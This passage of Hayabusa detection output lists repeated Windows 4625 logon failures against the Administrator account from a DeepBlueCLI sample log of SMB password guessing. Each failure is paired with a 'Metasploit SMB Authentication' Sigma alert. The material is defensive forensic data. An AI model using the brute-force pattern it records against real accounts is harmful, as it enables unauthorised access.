Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
